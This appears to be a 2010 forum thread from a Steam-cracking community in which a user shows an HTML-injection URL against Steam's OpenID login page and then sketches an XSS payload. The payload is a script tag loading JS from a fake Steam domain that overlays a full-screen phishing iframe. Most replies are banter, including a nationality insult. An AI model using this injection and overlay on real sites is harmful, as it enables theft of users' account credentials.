Logo

CS.RIN.RU - Steam Underground Community

IRC: #cs.rin.ru at irc.rizon.net
It is currently Friday, 17 Apr 2015, 14:52

English | Русский




Post new topic Reply to topic  [ 13 posts ] 
Author Message

Post Post subject: Steam API url exloiting   
Posted: Sunday, 21 Nov 2010, 03:28   
Advanced forumer Завсегдатай
User avatar
Joined: Tuesday, 23 Jun 2009, 10:03
Posts: 92
Location: United Kingdom, London
Just playing with the steam api and url's using a bit of my own html knowledge and managed to make there webpage do some intreasting tricks.

Exploited scrolling url :)

https://steamcommunity.com/openid/login?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.return_to=http%3A%2F%2FC0nw0nk%2Fconvert.php&openid.mode=checkid_setup&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.trust_root=http%3A%2F%2FC0nw0nk&openid.realm=http%3A%2F%2F%3Cmarquee%3EC0nw0nk%20was%20here%20%3Cp%3Ewww.steam-hacks.com

_________________
Image


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Sunday, 21 Nov 2010, 03:53   
a.k.a. Shaman AlicanC
User avatar
Joined: Friday, 15 Dec 2006, 16:43
Posts: 3693
Location: Istanbul, Turkey
I can't seem to find any serious vulnerability. Looks harmless.

_________________
I'm convinced that the only thing that kept me going was that I loved what I did.

I extreme this forum.


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Monday, 22 Nov 2010, 11:45   
Forum ghost Местное привидение
Joined: Saturday, 16 Aug 2008, 09:58
Posts: 317
not rly .... it could be a potential XSS attack and can steal password if you can load JS in the page


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Monday, 22 Nov 2010, 21:44   
Advanced forumer Завсегдатай
User avatar
Joined: Tuesday, 23 Jun 2009, 10:03
Posts: 92
Location: United Kingdom, London
You mean like this

<script type="text/javascript" src="fakesteamdomain.com/iframe.js"></script>

And the contents of the iframe.js file would be something allong the lines of.

  1. document.body.innerHTML=(
  2. '<div style="position:absolute; top:0px; left:0px; width:100%; height:100%;">'+
  3. '<iframe src=http://fakesteamdomain.com/faaaaaaake/phising/steam/index.html width=100% height=100%>'+
  4. '</iframe></div>'
  5. );

_________________
Image


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Monday, 22 Nov 2010, 22:51   
a.k.a. Shaman AlicanC
User avatar
Joined: Friday, 15 Dec 2006, 16:43
Posts: 3693
Location: Istanbul, Turkey
yaeh you are rght i hackered an xxs injecxtion and stole unieted staets nuclaer lunch codes

_________________
I'm convinced that the only thing that kept me going was that I loved what I did.

I extreme this forum.


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Monday, 22 Nov 2010, 23:26   
I live here Три раза сломал клаву :)
User avatar
Joined: Sunday, 02 Aug 2009, 20:57
Posts: 2091
Location: Bulgaria
Shaman AlicanC wrote:
yaeh you are rght i hackered an xxs injecxtion and stole unieted staets nuclaer lunch codes111
:ROFL:
Best English typing I've ever seen here.However it's still better than the everyday n00b typing.

_________________
Click here before your first post!

Handy links ;)
Random quotes
hegyak wrote:
We evolved from smart users with dumb terminals to dumb users with smart terminals.
^ This man speaks the truth.

Random user don't let it be you wrote:
Sorry for my bad English
Nearly all of us don't have English as a native language,so we can't bother you for that!
If you really doubt your English,go here and ask in your OWN language!


Random user wrote:
What's teh password p|0X?
99% of the stuff here has the password cs.rin.ru


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Tuesday, 23 Nov 2010, 00:58   
Advanced forumer Завсегдатай
User avatar
Joined: Tuesday, 23 Jun 2009, 10:03
Posts: 92
Location: United Kingdom, London
I dont blame your english being so shit, After all you are from turkey you have no one to blame but yourself.

(Perhaps your goverment)

_________________
Image


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Tuesday, 23 Nov 2010, 02:03   
I live here Три раза сломал клаву :)
Joined: Tuesday, 21 Feb 2006, 22:00
Posts: 2564
Location: On the beach having a beer
C0nw0nk wrote:
I dont blame your english being so shit, After all you are from turkey you have no one to blame but yourself.

(Perhaps your goverment)



goverment :ROFL:

and his English was bad?

_________________
no diggity


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Tuesday, 23 Nov 2010, 09:26   
Advanced forumer Завсегдатай
User avatar
Joined: Tuesday, 23 Jun 2009, 10:03
Posts: 92
Location: United Kingdom, London
Yup :) :ROFL:

_________________
Image


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Tuesday, 23 Nov 2010, 19:44   
I live here Три раза сломал клаву :)
User avatar
Joined: Sunday, 02 Aug 2009, 20:57
Posts: 2091
Location: Bulgaria
C0nw0nk wrote:
Yup

oh ya,hiz enlish wasn dat bad nao u grama nazy :lol:

_________________
Click here before your first post!

Handy links ;)
Random quotes
hegyak wrote:
We evolved from smart users with dumb terminals to dumb users with smart terminals.
^ This man speaks the truth.

Random user don't let it be you wrote:
Sorry for my bad English
Nearly all of us don't have English as a native language,so we can't bother you for that!
If you really doubt your English,go here and ask in your OWN language!


Random user wrote:
What's teh password p|0X?
99% of the stuff here has the password cs.rin.ru


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Tuesday, 23 Nov 2010, 22:03   
Advanced forumer Завсегдатай
User avatar
Joined: Tuesday, 23 Jun 2009, 10:03
Posts: 92
Location: United Kingdom, London
M3h i d0nt h4v3 t0 tak3 dis k1nda bu11$h!t scr3w y0u guy's 1m g01ng h0m3.

//EDIT : never mind i am home. :?

_________________
Image


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Wednesday, 24 Nov 2010, 00:44   
I live here Три раза сломал клаву :)
User avatar
Joined: Sunday, 02 Aug 2009, 20:57
Posts: 2091
Location: Bulgaria
1337 d035n'7 c0un7 M07H4F4k4
Spoiler
No offence :D

_________________
Click here before your first post!

Handy links ;)
Random quotes
hegyak wrote:
We evolved from smart users with dumb terminals to dumb users with smart terminals.
^ This man speaks the truth.

Random user don't let it be you wrote:
Sorry for my bad English
Nearly all of us don't have English as a native language,so we can't bother you for that!
If you really doubt your English,go here and ask in your OWN language!


Random user wrote:
What's teh password p|0X?
99% of the stuff here has the password cs.rin.ru


Top
 Profile  

Post Post subject: Re: Steam API url exloiting   
Posted: Wednesday, 24 Nov 2010, 01:36   
Advanced forumer Завсегдатай
User avatar
Joined: Tuesday, 23 Jun 2009, 10:03
Posts: 92
Location: United Kingdom, London
I declare h4x!!!

_________________
Image


Top
 Profile  
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 13 posts ] 


Who is online

Users browsing this forum: No registered users and 7 guests


Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum




Powered by phpBB® Forum Software © phpBB Group